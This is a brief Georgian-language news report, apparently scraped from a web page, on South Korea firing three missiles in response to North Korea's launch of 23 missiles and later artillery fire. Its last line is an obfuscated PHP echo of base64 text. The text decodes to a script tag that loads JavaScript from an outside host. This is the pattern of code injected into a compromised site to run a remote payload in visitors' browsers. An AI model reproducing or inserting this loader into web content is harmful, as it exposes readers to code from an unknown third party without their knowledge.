celsiusi
ავერსი შნაიდერი
სამხრეთ კორეამ ჩრდილოეთ კორეის საპასუხოდ სამი რაკეტა გაუშვა. „ჰაერი-ხმელეთის“ ტიპის რაკეტები სადავო საზღვაო დემარკაციის ხაზთან ჩამოვარდა. ინფორმაციას „ბიბისი“ ავრცელებს.
 
როგორც მედია წერს, მანამდე ფხენიანმა სამხრეთის მიმართულებით, ერთ დღეში 23 რაკეტა გაუშვა, რომელთაგან ერთი სამხრეთ კორეის ქალაქ სოქჩოდან 60 კილომეტრში ჩამოვარდა. ფხენიანის განმარტებით, რაკეტების გაშვების საბაბი ფართომასშტაბიანი სამხედრო წვრთნებია, რომელსაც სეული ვაშინგტონთან ერთად ატარებს.
 
გავრცელებული ცნობით, მოგვიანებით, ფხენიანმა კიდევ ექვსი ერთეული რაკეტა და 100-მდე საარტილერიო ჭურვი ისროლა.
 
სეულმა მომხდარი მათი ტერიტორიაზე „დაუშვებელ“ ინციდენტად შეაფასა.
361
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");